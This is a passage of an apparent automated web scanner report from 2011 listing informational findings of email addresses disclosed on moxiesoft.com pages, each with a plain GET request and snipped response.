Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25177


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><Title>M
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.126. http://www.moxiesoft.com/search.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /search.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /search.aspx?searchtext= HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:05:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25903


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.127. http://www.moxiesoft.com/sitemap.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /sitemap.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sitemap.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:05:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25624


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a href="http://webteam@moxiesoft.com">
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.128. http://www.moxiesoft.com/solutions/cust-engagement-spaces.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /solutions/cust-engagement-spaces.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /solutions/cust-engagement-spaces.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:03:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28945


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.129. http://www.moxiesoft.com/solutions/emp-engagement-spaces.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /solutions/emp-engagement-spaces.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /solutions/emp-engagement-spaces.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:03:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31308


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.130. http://www.moxiesoft.com/solutions/spaces-solutions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /solutions/spaces-solutions.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /solutions/spaces-solutions.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:02:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26209


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.131. http://www.moxiesoft.com/tal_about/aboutus.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_about/aboutus.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_about/aboutus.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33468


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.132. http://www.moxiesoft.com/tal_about/careers.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_about/careers.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_about/careers.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31078


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.133. http://www.moxiesoft.com/tal_about/contact.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_about/contact.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_about/contact.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37199


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.134. http://www.moxiesoft.com/tal_about/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_about/default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_about/default.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.135. http://www.moxiesoft.com/tal_about/directors.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_about/directors.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_about/directors.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33939


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.136. http://www.moxiesoft.com/tal_about/legal.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_about/legal.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_about/legal.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:02:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.137. http://www.moxiesoft.com/tal_about/management.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_about/management.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_about/management.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58419


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.138. http://www.moxiesoft.com/tal_about/partners/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_about/partners/default.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_about/partners/default.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:02:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34898


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.139. http://www.moxiesoft.com/tal_about/terms-of-use.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_about/terms-of-use.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_about/terms-of-use.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:02:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42518


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.140. http://www.moxiesoft.com/tal_lp/campaign.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_lp/campaign.aspx

Issue detail

The following email addresses were disclosed in the response:

gsmith@ngenera.com
info@moxiesoft.com

Request

GET /tal_lp/campaign.aspx?id=3576 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:05:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75065


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<input type="hidden" name="send_to" value="gsmith@ngenera.com">
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.141. http://www.moxiesoft.com/tal_lp/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_lp/default.aspx

Issue detail

The following email addresses were disclosed in the response:

cimleads@ngenera.com
info@moxiesoft.com

Request

GET /tal_lp/default.aspx?id=2736 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:05:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 80054


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<input type="hidden" name="send_to" value="cimleads@ngenera.com">
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.142. http://www.moxiesoft.com/tal_news/awards.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_news/awards.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_news/awards.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33529


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.143. http://www.moxiesoft.com/tal_news/customers.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_news/customers.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_news/customers.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
